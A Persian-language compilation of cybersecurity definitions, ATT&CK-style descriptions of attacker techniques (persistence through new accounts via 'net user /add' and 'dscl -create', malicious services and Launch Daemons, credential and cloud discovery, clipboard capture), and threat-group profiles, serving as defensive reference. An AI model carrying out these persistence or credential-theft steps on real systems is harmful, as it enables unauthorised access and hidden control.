نظارت بر تهدیدات امنیت سایبری فرآیند شناسایی تهدیدات سایبری و نقض داده ها را توصیف می کند. نظارت بر زیرساخت‌های فناوری اطلاعات بخش مهمی از مدیریت ریسک سایبری است که سازمان‌ها را قادر می‌سازد حملات سایبری را در مراحل ابتدایی شناسایی کرده و قبل از ایجاد آسیب و اختلال به آنها پاسخ دهند. نظارت مستمر یا 24×7 امنیت سایبری از طریق یک ارائه دهنده خدمات امنیتی با تجربه می تواند هشدارهای تهدید را به شدت بهبود بخشد و کمک کند تا زمان بیشتری برای استراتژی های امنیتی صرف شود. همانطور که محل کارهای مدرن به طور فزاینده ای متمرکز بر ابر و دیجیتالی می شوند، محیط سنتی شبکه تار می‌شود. تهدیدات سایبری برای استفاده از آسیب‌پذیری‌های جدیدی که روزانه ظاهر می‌شوند در حال تکامل هستند. در حالی که فناوری امنیتی پیشگیرانه قادر به تهدیدهای مبتنی بر امضای شناخته شده است، نظارت بر تهدیدات امنیت سایبری برای شناسایی تهدیدهای پیچیده تری که از این کنترل ها دور می شوند، مورد نیاز است. نظارت مستمر امنیت سایبری به سازمان ها کمک می کند: طیف وسیع تری از تهدیدات را شناسایی کنید زمان پاسخگویی به حملات را کاهش دهید مطابق با صنعت و الزامات نظارتی

کشف داده ها شامل شناسایی و مکان یابی داده های حساس یا تنظیم شده برای محافظت کافی یا حذف ایمن آن‌ها می‌شود. یکی از بزرگ‌ترین روندهای هوش تجاری در سال‌های اخیر، کشف داده‌ها، برای بسیاری از تیم‌های امنیتی سازمانی اولویت دارد، زیرا یک جزء حیاتی در آمادگی برای انطباق است. کشف داده شامل ممیزی اطلاعات حساس یا تنظیم‌شده، از جمله داده‌های محرمانه یا اختصاصی و همچنین داده‌های محافظت‌شده مانند اطلاعات شناسایی شخصی (PII) یا اطلاعات سلامت الکترونیکی محافظت‌شده (ePHI) است. کشف داده ها تیم های امنیتی را قادر می سازد تا این اطلاعات را شناسایی کنند تا از آن محافظت کنند و از محرمانه بودن، یکپارچگی و در دسترس بودن آن اطمینان حاصل کنند. مزایای کشف داده ها و راه حل های امنیتی آگاه از زمینه بسیار گسترده است و شامل موارد زیر است: بهبود فرآیند درک اطلاعاتی که شرکت در اختیار دارد، کجا ذخیره می‌شود، چه کسی می‌تواند به آن دسترسی داشته باشد و کجا و چگونه منتقل می‌شود. اعمال طبقه بندی های از پیش تعریف شده و سیاست های حفاظتی برای داده های سازمانی. نظارت مستمر و جامع بر دسترسی و فعالیت داده ها. طبقه بندی خودکار داده ها بر اساس زمینه. مدیریت ریسک و رعایت مقررات. مشاهده کامل داده ها شناسایی، طبقه بندی و ردیابی داده های حساس. توانایی اعمال کنترل های حفاظتی بر روی داده ها در زمان واقعی بر اساس از پیش تعریف شده. سیاست‌ها و عوامل زمینه ای

تعریف ما از درگیری سایبری استفاده از فناوری‌های محاسباتی است که به عنوان استفاده از ریزپردازنده‌ها و سایر فناوری‌های مرتبط در فضای سایبری برای اهداف بدخواهانه و یا مخرب به‌منظور تأثیر، تغییر یا اصلاح تعاملات دیپلماتیک و نظامی بین نهادها تعریف می‌شود.

میدان نبرد سایبری مکانی است شامل باگ ها و ویروس ها که باید با انها مبارزه کرد. سه سلاح برای میدان نبرد سایبری وجود دارد: بیومتریک، آموزش، مشارکت های جهانی که به کشورها و سازمان ها کمک می کند تا از شبکه های خود محافظت کنند. مجرمان سایبری از هر زاویه به اهداف خود حمله می کنند. در زمانی که مردم در مضیقه‌تر هستند، کشورها و سازمان‌ها باید دائماً مراقب باشند تا از تلاش‌های مخرب برای سرقت پول یا اطلاعات ارزشمند جلوگیری کنند. سه ابزار فناوری وجود دارد که می تواند به افزایش امنیت سایبری کمک کند: بیومتریک، تجزیه و تحلیل و هوش مصنوعی. جایگزینی رمزهای عبور با تأییدهای بیومتریک می تواند به ویژه در برابر تهدیدات مهندسی اجتماعی مفید باشد. این نوع حملات معمولاً از طریق مکالمه شخصی به جستجوی رمز عبور می‌پردازند، اما ویژگی‌های انسانی مانند اثر انگشت، ویژگی‌های صورت و راه رفتن غیرممکن است و به سختی می‌توان آن را تکرار کرد. لازم به ذکر است احراز هویت بدون رمز عبور واقعاً احتمال خطر امنیتی و اعتبار را کاهش می دهد. احراز هویت بیومتریک فقط به ویژگی های فیزیکی محدود نمی شود. ابزارهای بیومتریک رفتاری می توانند الگوهای ظریفی را که کاربران حتی ممکن است از آنها آگاه نباشند، تشخیص دهند. به عنوان مثال، مجرمان سایبری که با برنامه های کامپیوتری آشنایی کامل دارند، می توانند زمانی که از میانبر صفحه کلید غیر معمول استفاده می کنند، خود را تسلیم کنند. صدا، موقعیت جغرافیایی و دستگاه همچنین می توانند به کارکنان امنیتی در شناسایی جعل هویت افراد کمک کنند. بسیاری از پاسخ‌های دفاع سایبری می‌توانند خودکار باشند، که برای مقابله تیم‌های امنیتی با تعداد فزاینده‌ای از تهدیدات مفید خواهد بود. در حالت ایده‌آل، زمانی که تهدیدها گزارش می‌شوند، بلافاصله توسط انسان‌ها ارزیابی می‌شوند، اما «این در دنیای واقعی اتفاق نمی‌افتد، مگر اینکه بودجه امنیتی زیادی داشته باشید که اکثر سازمان‌ها ندارند». آموزش و آگاهی شرکت ها باید از کارمندان به عنوان "چشم و گوش" خود در زمین استفاده کنند. اگرچه تیم‌های امنیتی نمی‌توانند با کار از راه دور همه چیز را در شبکه‌شان ببینند، اما می‌توانند کارمندان را وادار کنند که ایمیل‌های مشکوک را هنگام باز شدن پرچم‌گذاری کنند. همین اصل به اقدامات ملی علیه ایمیل های جعلی نیز تعمیم می یابد. مهمترین بخش آموزش و افزایش آگاهی کارکنان است تا بدانند از نظر تهدیدها با چه چیزی سر و کار دارند و در هنگام حمله چه باید بکنند. به اشتراک گذاری اطلاعات به اشتراک گذاری اطلاعات کاری است که مجرمان سایبری آن را به خوبی انجام می دهند، اما کارمندان شرکتها یا سازمانها "به همین اندازه یا به خوبی انجام نمی دهند". این واقعاً برای افرادی که تلاش می‌کنند از سیستم‌ها دفاع کنند یک ضرر است، زیرا انها نمی‌دانند تهدیدات چیست.

تعریف عمومی پذیرفته شده جنگ سایبری استفاده از حملات سایبری علیه یک دولت-ملت است که باعث آسیب‌های قابل توجهی از جمله جنگ فیزیکی، اختلال در سیستم های کامپیوتری حیاتی و تلفات جانی می شود. با این حال، در مورد اینکه چه اقداماتی به طور خاص به عنوان جنگ سایبری واجد شرایط هستند، بحث هایی در میان کارشناسان وجود داشته است. در حالی که وزارت دفاع ایالات متحده (DOD) بیان می کند که استفاده از رایانه و اینترنت برای انجام جنگ در فضای سایبری تهدیدی برای امنیت ملی است. اگرچه جنگ سایبری به طور کلی به حملات سایبری انجام شده توسط یک دولت-ملت به کشور دیگر اشاره دارد، اما می‌تواند حملات گروه‌های تروریستی یا گروه‌های هکر با هدف پیشبرد اهداف کشورهای خاص را نیز توصیف کند.

دشمنان ممکن است باینری های نرم افزار مشتری را برای ایجاد دسترسی دائمی به سیستم ها تغییر دهند. نرم افزار کلاینت به کاربران امکان دسترسی به خدمات ارائه شده توسط سرور را می دهد. انواع نرم افزارهای مشتری رایج عبارتند از کلاینت های SSH، کلاینت های FTP، کلاینت های ایمیل و مرورگرهای وب. هنگامی که آن برنامه ها در حال استفاده هستند، دشمنان ممکن است تغییراتی در باینری های نرم افزار مشتری برای انجام کارهای مخرب ایجاد کنند. به عنوان مثال، یک دشمن ممکن است کد منبع نرم افزار مشتری را کپی کند، یک درب پشتی اضافه کند، برای هدف کامپایل کند، و باینری برنامه قانونی (یا فایل های پشتیبانی) را با درپشتی جایگزین کند. از آنجایی که این برنامه ها ممکن است به طور معمول توسط کاربر اجرا شوند، حریف می تواند از آن برای دسترسی دائمی به میزبان استفاده کند.

دشمنان ممکن است یک حساب کاربری برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. با سطح دسترسی کافی، ایجاد چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شود. حساب‌ها ممکن است در سیستم محلی یا در یک دامنه یا مستاجر ابری ایجاد شوند. در محیط های ابری، دشمنان ممکن است حساب هایی ایجاد کنند که فقط به خدمات خاصی دسترسی داشته باشند، که می تواند شانس شناسایی را کاهش دهد.

دشمنان ممکن است یک حساب محلی برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. با سطح دسترسی کافی، دستور net user /add را می توان برای ایجاد یک حساب محلی استفاده کرد. در سیستم‌های macOS می‌توان از دستور dscl –create برای ایجاد یک حساب محلی استفاده کرد. چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شوند.

دشمنان ممکن است یک حساب دامنه برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب های دامنه می توانند حساب‌های کاربر، سرپرست و سرویس را پوشش دهند. با سطح دسترسی کافی، دستور net user /add /domain را می توان برای ایجاد یک حساب دامنه استفاده کرد. چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شوند.

دشمنان ممکن است یک حساب ابری برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. با سطح دسترسی کافی، چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارد، استفاده شوند.دشمنان ممکن است حساب هایی ایجاد کنند که فقط به خدمات ابری خاصی دسترسی داشته باشند، که می تواند شانس شناسایی را کاهش دهد.

دشمنان ممکن است فرآیندهای سطح سیستم را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. هنگامی که سیستم عامل ها بوت می شوند، می توانند فرآیندهایی را شروع کنند که عملکردهای سیستم پس زمینه را انجام می دهند. در ویندوز و لینوکس، این فرآیندهای سیستمی به عنوان خدمات شناخته می شوند. در macOS، فرآیندهای راه‌اندازی به نام Launch Daemon و Launch Agent برای تکمیل اولیه‌سازی سیستم و بارگیری پارامترهای خاص کاربر اجرا می‌شوند.دشمنان ممکن است سرویس‌ها، دیمون‌ها یا عوامل جدیدی را نصب کنند که می‌توانند برای اجرا در هنگام راه‌اندازی یا یک بازه زمانی قابل تکرار پیکربندی شوند تا پایداری ایجاد کنند. به طور مشابه، دشمنان ممکن است خدمات، دیمون ها یا عوامل موجود را برای دستیابی به همان اثر تغییر دهند. سرویس‌ها، دیمون‌ها یا عوامل ممکن است با امتیازات مدیر ایجاد شوند اما تحت امتیازات root/SYSTEM اجرا شوند. دشمنان ممکن است از این عملکرد برای ایجاد یا اصلاح فرآیندهای سیستم به منظور افزایش امتیازات استفاده کنند.

دشمنان ممکن است عوامل راه‌اندازی را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند.

دشمنان ممکن است خدمات سیستمی را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. مدیر سرویس systemd معمولاً برای مدیریت فرآیندهای شبح پس‌زمینه (همچنین به عنوان سرویس‌ها شناخته می‌شود) و سایر منابع سیستم استفاده می‌شود Systemd سیستم اولیه (init) پیش‌فرض در بسیاری از توزیع‌های لینوکس است که با Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15شروع می‌شود و جایگزین سیستم‌های init قدیمی از جمله SysVinit و Upstart می‌شود در حالی که با سیستم‌های init فوق‌الذکر سازگار است.

دشمنان ممکن است سرویس‌های ویندوز را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. وقتی ویندوز بوت می‌شود، برنامه‌ها یا برنامه‌هایی به نام سرویس‌ها را راه‌اندازی می‌کند که عملکردهای سیستم پس‌زمینه را انجام می‌دهند. اطلاعات پیکربندی سرویس ویندوز، از جمله مسیر فایل به برنامه ها/فرمان های اجرایی یا بازیابی سرویس، در رجیستری ویندوز ذخیره می شود. تنظیمات سرویس را می توان با استفاده از ابزارهایی مانند sc.exe و Reg تغییر داد. دشمنان ممکن است با استفاده از ابزارهای سیستمی برای تعامل با سرویس‌ها، با تغییر مستقیم رجیستری یا با استفاده از ابزارهای سفارشی برای تعامل با Windows API، یک سرویس جدید نصب کنند یا یک سرویس موجود را تغییر دهند. دشمنان ممکن است سرویس‌ها را برای اجرا در هنگام راه‌اندازی پیکربندی کنند تا در یک سیستم تداوم داشته باشند. حریف همچنین ممکن است با استفاده از نام سرویس از یک سیستم عامل مرتبط یا نرم‌افزار خوش‌خیم، یا با تغییر سرویس‌های موجود برای چالش‌برانگیزتر کردن تجزیه‌وتحلیل تشخیص، Masquerading را وارد کند. تغییر سرویس‌های موجود ممکن است عملکرد آنها را مختل کند یا ممکن است سرویس‌هایی را که غیرفعال شده‌اند یا معمولاً استفاده نمی‌شوند فعال کند. سرویس‌ها ممکن است با امتیازات سرپرست ایجاد شوند اما تحت امتیازات SYSTEM اجرا می‌شوند، بنابراین دشمن ممکن است از سرویسی برای افزایش امتیازات از مدیر به SYSTEM استفاده کند. همچنین ممکن است دشمنان مستقیماً خدمات را از طریق Service Execution شروع کنند.

دشمنان ممکن است Launch Daemons را برای اجرای بارهای مخرب به عنوان بخشی از پایداری ایجاد یا تغییر دهند. Launch Daemons فایل‌های plist هستند که برای تعامل با Launchd، چارچوب مدیریت خدمات مورد استفاده توسط macOS استفاده می‌شوند. Launch Daemons برای نصب به امتیازات بالایی نیاز دارد، برای هر کاربر در یک سیستم قبل از ورود به سیستم اجرا می شود و بدون نیاز به تعامل کاربر در پس زمینه اجرا می شود. در طول راه‌اندازی اولیه macOS، فرآیند راه‌اندازی شده، پارامترهای مربوط به راه‌اندازی در سطح سیستم را از فایل‌های plist موجود در /System/Library/LaunchDaemons/ و /Library/LaunchDaemons/ بارگیری می‌کند. پارامترهای مورد نیاز Launch Daemons شامل یک برچسب برای شناسایی کار، برنامه برای ارائه مسیری به فایل اجرایی و RunAtLoad برای تعیین زمان اجرای وظیفه است. Launch Daemon اغلب برای دسترسی به منابع مشترک، به روز رسانی نرم افزار، یا انجام وظایف اتوماسیون استفاده می شود. دشمنان ممکن است یک Launch Daemon را نصب کنند که برای اجرا در هنگام راه اندازی با استفاده از پارامتر RunAtLoad روی true و پارامتر Program در مسیر اجرایی مخرب تنظیم شده است. نام دیمون ممکن است با استفاده از نامی از یک سیستم عامل مرتبط یا نرم افزار خوش خیم (به عنوان مثال ( Masquerading) پنهان شود. هنگامی که Launch Daemon اجرا می شود، برنامه مجوزهای اداری را به ارث می برد. علاوه بر این، تغییرات پیکربندی سیستم (مانند نصب نرم افزار مدیریت بسته شخص ثالث) ممکن است باعث شود پوشه هایی مانند usr/local/bin به صورت جهانی قابل نوشتن باشند. بنابراین، این امکان وجود دارد که پیکربندی‌های ضعیف به دشمن اجازه دهد تا فایل‌های اجرایی ارجاع‌شده توسط فایل‌های plist Launch Daemon را تغییر دهد.

قدرت سایبری توانایی سازمان یافته جامعه برای استفاده از فناوری دیجیتال برای نظارت، بهره برداری، براندازی و اجبار در درگیری های بین المللی است. همه اینها را می توان از طریق استفاده هوشمندانه از فناوری دیجیتال و بدون استقرار نیروهای نظامی یا جاسوسان انسانی انجام داد.

رزم سایبری معمولاً به عنوان یک حمله سایبری یا مجموعه ای از حملات که یک کشور را هدف قرار می دهد تعریف می شود و این پتانسیل را دارد که زیرساخت‌های دولتی و غیرنظامی را ویران کند و سیستم‌های حیاتی را مختل کند و در نتیجه به دولت آسیب وارد کند و حتی جان افراد را از دست بدهد.

یک تمرین سایبری واکنش رویداد یک سازمان را آزمایش می کند. آنها بر تأثیر کسب و کار تمرکز می کنند و می‌توانند به عنوان آزمونی برای افراد و فرآیندها در نظر گرفته شوند. آنها به سازمان ها اجازه می دهند تا رویه‌های واکنش به حادثه خود را به شیوه ای ایمن و کنترل شده توسعه دهند و تمرین کنند.

حمله سایبری حمله ای است که توسط مجرمان سایبری با استفاده از یک یا چند رایانه علیه یک یا چند رایانه یا شبکه انجام می شود. یک حمله سایبری می‌تواند به طور مخرب رایانه‌ها را غیرفعال کند، داده‌ها را سرقت کند، یا از رایانه‌ای که نفوذ کرده است به عنوان نقطه راه‌اندازی برای حملات دیگر استفاده کند. مجرمان سایبری از روش‌های مختلفی برای حمله سایبری استفاده می‌کنند، از جمله بدافزار، فیشینگ، باج‌افزار، انکار سرویس و سایر روش‌ها.

درگیریسایبری شامل اقدامات یک دولت-ملت یا سازمان بین‌المللی برای حمله و تلاش برای آسیب رساندن به رایانه‌ها یا شبکه‌های اطلاعاتی یک کشور دیگر از طریق، برای مثال، ویروس‌های رایانه‌ای یا حملات انکار سرویس است.

ایمنی سایبری مفهوم جدیدی است که در آن سیستم‌های ایمنی سایبری باید توانایی ذاتی برای مقاومت در برابر انواع حملات سایبری، از جمله عوامل عفونی جدید که برای راه‌حل‌های کلاسیک امنیت سایبری نامرئی هستند، داشته باشند.

دشمنان ممکن است برای به دست آوردن اعتبار کاربری، مکان های ذخیره رمز عبور رایج را جستجو کنند. بسته به سیستم عامل یا برنامه ای که اعتبارنامه را در اختیار دارد، رمزهای عبور در چندین مکان در یک سیستم ذخیره می شوند. همچنین برنامه های خاصی وجود دارند که رمزهای عبور را ذخیره می کنند تا مدیریت و نگهداری را برای کاربران آسان تر کنند. پس از به دست آوردن اعتبار، می توان از آنها برای انجام حرکت جانبی و دسترسی به اطلاعات محدود استفاده کرد.

یک دشمن ممکن است سعی کند منابعی را که در یک محیط زیرساخت به عنوان سرویس (IaaS) در دسترس است، کشف کند. این شامل منابع خدمات محاسباتی مانند نمونه ها، ماشین های مجازی و عکس های فوری و همچنین منابع خدمات دیگر از جمله سرویس های ذخیره سازی و پایگاه داده می شود. ارائه دهندگان ابر روشهایی مانند API و دستورات صادر شده از طریق CLI را برای ارائه اطلاعات در مورد زیرساخت ارائه می دهند. به عنوان مثال، AWS یک API DescribeInstance را در آمازون EC2 APIارائه می‌کند که می‌تواند اطلاعات یک یا چند نمونه را در یک حساب بازگرداند، ListBuckets API که فهرستی از تمام سطل‌های متعلق به فرستنده تأیید شده درخواست را برمی‌گرداند، یا GetPublicAccessBlock API به پیکربندی بلوک دسترسی را برای یک سطل بازیابی کنید. به طور مشابه، GCP's Cloud SDK CLI دستور فهرست نمونه‌های محاسباتی gcloud را برای فهرست کردن تمام نمونه‌های موتور محاسباتی Google در یک پروژه ارائه می‌کند و دستور CLI az vm لیست جزئیات ماشین‌های مجازی را فهرست می‌کند. حریف ممکن است منابعی را با استفاده از کلیدهای دسترسی کاربر در معرض خطر شمارش کند تا مشخص کند کدام یک در دسترس آن کاربر است. کشف این منابع موجود ممکن است به دشمنان کمک کند تا مراحل بعدی خود را در محیط Cloud تعیین کنند، مانند ایجاد Persistenceاحراز هویت. دشمنان همچنین ممکن است ازAPIهای کشف زیرساخت مانند DescribeDBInstances برای تعیین اندازه، مالک، مجوزها و ACLهای شبکه منابع پایگاه داده استفاده کنند. دشمنان می توانند از این اطلاعات برای تعیین ارزش بالقوه پایگاه های داده و کشف الزامات دسترسی به آنها استفاده کنند. برخلاف کشف سرویس ابری، این تکنیک بر کشف اجزای خدمات ارائه شده به جای خود سرویس‌ها تمرکز دارد.

حریف ممکن است پس از دستیابی به دسترسی، سعی کند خدمات ابری را که بر روی یک سیستم اجرا می شوند، شمارش کند. این روش ها می توانند از پلتفرم به عنوان سرویس (PaaS)، به زیرساخت به عنوان سرویس (IaaS) یا نرم افزار به عنوان سرویس (SaaS) متفاوت باشند. خدمات بسیاری در سراسر ارائه دهندگان ابری مختلف وجود دارد و می تواند شامل یکپارچه سازی مداوم و تحویل مداوم (CI/CD، توابع Lambda، Azure AD و غیره باشد. ممکن است دشمنان سعی کنند اطلاعاتی را در مورد خدمات فعال در سراسر محیط کشف کنند. ابزارها و APIهای Azure، مانند Azure AD Graph API و Azure Resource Manager API، می‌توانند منابع و سرویس‌ها، از جمله برنامه‌های کاربردی، گروه‌های مدیریتی، منابع و تعاریف خط‌مشی، و روابط آنها را که با یک هویت قابل دسترسی هستند، شمارش کنند. Stormspotter یک ابزار منبع باز برای شمارش و ساخت یک نمودار برای منابع و خدمات Azure است و Pacu یک چارچوب بهره برداری منبع باز AWS است که از چندین روش برای کشف سرویس های ابری پشتیبانی می کند.

دشمنان ممکن است اشیاء را در زیرساخت ذخیره سازی ابری شمارش کنند. دشمنان ممکن است از این اطلاعات در طول کشف خودکار برای شکل دادن به رفتارهای بعدی، از جمله درخواست همه یا اشیاء خاص از فضای ذخیره سازی ابری استفاده کنند. مشابه File and Directory Discovery در یک میزبان محلی، پس از شناسایی سرویس‌های ذخیره‌سازی موجود یعنی (Cloud Infrastructure Discovery) دشمنان ممکن است به محتویات/اشیاء ذخیره‌شده در زیرساخت ابر دسترسی پیدا کنند. ارائه دهندگان خدمات ابری API هایی را ارائه می دهند که به کاربران امکان می دهد اشیاء ذخیره شده در فضای ذخیره سازی ابری را شمارش کنند.

ممکن است دشمنان سعی کنند کانتینرها و سایر منابع موجود در محیط کانتینر را کشف کنند. منابع دیگر ممکن است شامل تصاویر، استقرارها، پادها، گره ها و سایر اطلاعات مانند وضعیت یک خوشه باشد. این منابع را می توان در برنامه‌های کاربردی وب مانند داشبورد Kubernetes مشاهده کرد یا می‌توان از طریق Docker و Kubernetes APIs جستجو کرد. در Docker، گزارش‌ها ممکن است اطلاعات مربوط به محیط، مانند پیکربندی محیط، خدمات در دسترس و ارائه‌دهنده ابری که قربانی ممکن است از آن استفاده کند، درز کند. کشف این منابع ممکن است گام‌های بعدی حریف در محیط، مانند نحوه انجام حرکت جانبی و روش‌هایی که برای اجرا استفاده شود را نشان دهد.

دشمنان ممکن است داده های ذخیره شده در کلیپ بورد را از کاربرانی که اطلاعات را در داخل یا بین برنامه ها کپی می کنند جمع آوری کنند. در Windows، برنامه‌ها می‌توانند با استفاده از Windows API به داده‌های کلیپ‌بورد دسترسی داشته باشند. OSX یک دستور بومی، pbpaste، برای گرفتن محتویات کلیپ بورد ارائه می دهد.[2]

دشمنان می توانند با استفاده از رسانه های قابل جابجایی برای انتقال دستورات از سیستمی به سیستم، فرمان و کنترل را بین میزبان های در معرض خطر در شبکه های بالقوه قطع شده انجام دهند. هر دو سیستم باید به خطر بیفتند، با این احتمال که ابتدا یک سیستم متصل به اینترنت و دومی از طریق حرکت جانبی توسط Replication Through Removable Media به خطر بیفتد. دستورات و فایل ها از سیستم قطع شده به سیستم متصل به اینترنت که حریف مستقیماً به آن دسترسی دارد، منتقل می شود.

Carbanak یک گروه مجرم سایبری است که حداقل از سال 2013 از بدافزار Carbanak برای هدف قرار دادن موسسات مالی استفاده کرده است.

Chimera یک گروه تهدید مشکوک مستقر در چین است که حداقل از سال 2018 با هدف قرار دادن صنعت نیمه هادی در تایوان و همچنین داده های صنعت خطوط هوایی فعال بوده است.

Cleaver یک گروه تهدید است که به بازیگران ایرانی نسبت داده شده است و مسئولیت فعالیت های ردیابی شده با عنوان Operation Cleaver را بر عهده دارد. شواهد قوی حاکی از آن است که Cleaver به گروه تهدید 2889 (TG-2889) مرتبط است.

گروه کبالت یک گروه تهدید با انگیزه مالی است که در درجه اول موسسات مالی را حداقل از سال 2016 هدف قرار داده است. این گروه از طریق هدف قرار دادن سیستم های خودپرداز، پردازش کارت، سیستم های پرداخت و سیستم های سوئیفت، برای سرقت پول اقدام به نفوذ کرده است. گروه کبالت عمدتاً بانک های اروپای شرقی، آسیای مرکزی و آسیای جنوب شرقی را هدف قرار داده است. یکی از رهبران ادعایی در اوایل سال 2018 در اسپانیا دستگیر شد، اما به نظر می رسد این گروه همچنان فعال است. این گروه شناخته شده است که سازمان ها را هدف قرار می دهد تا از دسترسی آنها برای به خطر انداختن قربانیان دیگر استفاده کند. گزارش ها نشان می دهد که ممکن است بین Cobalt Group و بدافزار Carbanak و گروه Carbanak پیوندهایی وجود داشته باشد.

CopyKittens یک گروه جاسوسی سایبری ایرانی است که حداقل از سال 2013 فعالیت می کند. این گروه کشورهایی از جمله اسرائیل، عربستان سعودی، ترکیه، ایالات متحده، اردن و آلمان را هدف قرار داده است. این گروه مسئول کمپین معروف به عملیات لاله های پژمرده است.

CostaRicto یک کمپین جاسوسی سایبری مشکوک برای استخدام هکرها است که از حداقل سال 2019 چندین صنعت را در سراسر جهان هدف قرار داده است. با تمرکز زیاد در جنوب آسیا.

حملات مبتنی بر اعتبار زمانی اتفاق می‌افتند که مهاجمان اعتبارنامه‌ها را برای دستیابی به دسترسی، دور زدن اقدامات امنیتی سازمان و سرقت داده‌های حیاتی به سرقت ببرند. سرقت اعتبار، اولین مرحله از یک حمله مبتنی بر اعتبار، فرآیند سرقت اعتبار است.

جمع آوری سایبری به استفاده از تکنیک های جنگ سایبری به منظور انجام جاسوسی اشاره دارد. فعالیت‌های جمع‌آوری سایبری معمولاً به درج بدافزار در یک شبکه یا رایانه هدفمند به منظور اسکن، جمع‌آوری و استخراج اطلاعات حساس متکی است.

سرور فرمان و کنترل (C&C) کامپیوتری است که توسط یک مهاجم یا مجرم سایبری کنترل می‌شود و برای ارسال دستورات به سیستم‌هایی که توسط بدافزار در معرض خطر قرار گرفته‌اند و دریافت داده‌های دزدیده شده از یک شبکه هدف استفاده می‌شود.

استحکام سایبری توانایی یک سیستم فناوری اطلاعات و ارتباطات برای مقاومت در برابر مهاجمان هوشمند و هدف‌گرا، یعنی تهدیدهای پایدار پیشرفته است. مهاجمان امتیازات خود را افزایش می دهند، به عنوان مثال: حقوق دسترسی از طریق افزایش امتیاز.

پیمایش دایرکتوری (همچنین به عنوان پیمایش مسیر پرونده نیز شناخته می‌شود) یک آسیب‌پذیری امنیت وب است که به مهاجم اجازه می‌دهد فایل‌های دلخواه را در سروری که برنامه‌ای را اجرا می‌کند بخواند. این ممکن است شامل کد برنامه و داده‌ها، اعتبارنامه سیستم‌های پشتیبان و فایل‌های حساس سیستم عامل باشد. در برخی موارد، یک مهاجم ممکن است بتواند روی پرونده‌های دلخواه روی سرور بنویسد و به آنها اجازه دهد داده‌ها یا رفتار برنامه را تغییر دهند و در نهایت کنترل کامل سرور را در دست بگیرند.

دشمنان ممکن است قابلیت‌هایی را ایجاد کنند که بتوان از آنها در هنگام هدف‌گیری استفاده کرد. به جای خرید، بارگیری رایگان یا سرقت قابلیت‌ها، دشمنان ممکن است قابلیت‌های داخلی خود را توسعه دهند. این فرایند شناسایی الزامات توسعه و ایجاد راه‌حل‌هایی مانند بدافزارها، سوء استفاده‌ها و گواهینامه‌های خود امضا است. همچنین دشمنان ممکن است قابلیت‌هایی را برای پشتیبانی از عملیات خود در مراحل متعدد چرخه حیات دشمن توسعه دهند. همانطور که در مورد تلاش‌های توسعه مشروع، ممکن است مجموعه‌های مختلف مهارت برای توسعه قابلیت‌ها مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از پیمانکار ممکن است گسترش قابلیت‌های توسعه آن دشمن تلقی شود، به شرطی که دشمن در شکل‌گیری الزامات ایفای نقش کند و تا حدی انحصار توانایی را حفظ کند.

دشمنان ممکن است بدافزار و مؤلفه‌های بدافزاری را ایجاد کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. ساختن نرم افزارهای مخرب می‌تواند شامل توسعه ابزارهای پس از سازش، درهای پشتی، پروتکل‌های C2 و ایجاد رسانه‌های قابل جابجایی آلوده باشد. دشمنان ممکن است بدافزاری را برای پشتیبانی از عملیات خود ایجاد کنند، ابزاری برای حفظ کنترل ماشین‌های راه دور، فرار از دفاع، و اجرای رفتارهای پس از سازش ایجاد کنند. همانند تلاش‌های توسعه مشروع، ممکن است مجموعه مهارت‌های مختلفی برای توسعه بدافزار مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از یک پیمانکار ممکن است گسترش قابلیت‌های توسعه بدافزار آن دشمن در نظر گرفته شود، مشروط بر اینکه دشمن در شکل‌دهی نیازمندی‌ها نقش داشته باشد و درجه انحصاری را برای بدافزار حفظ کند. برخی از جنبه‌های توسعه بدافزار، مانند توسعه پروتکل C2، ممکن است به دشمنان نیاز داشته باشد تا زیرساخت بیشتری را به دست آورند.

دشمنان ممکن است گواهی‌های امضای کد خود امضا را ایجاد کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. امضای کد فرآیند امضای دیجیتالی فایل‌های اجرایی و اسکریپت‌ها برای تایید نویسنده نرم افزار و تضمین عدم تغییر یا خرابی کد است. امضای کد سطحی از اعتبار برنامه را از سوی توسعه دهنده و تضمین عدم دستکاری برنامه را فراهم می‌کند. کاربران و/یا ابزارهای امنیتی ممکن است به یک کد امضا شده بیشتر از یک کد بدون امضا اعتماد کنند، حتی اگر ندانند چه کسی گواهی را صادر کرده یا نویسنده آن کیست. قبل از امضای کد، دشمنان ممکن است گواهی‌های امضای کد خودامضا را برای استفاده در عملیات توسعه دهند.

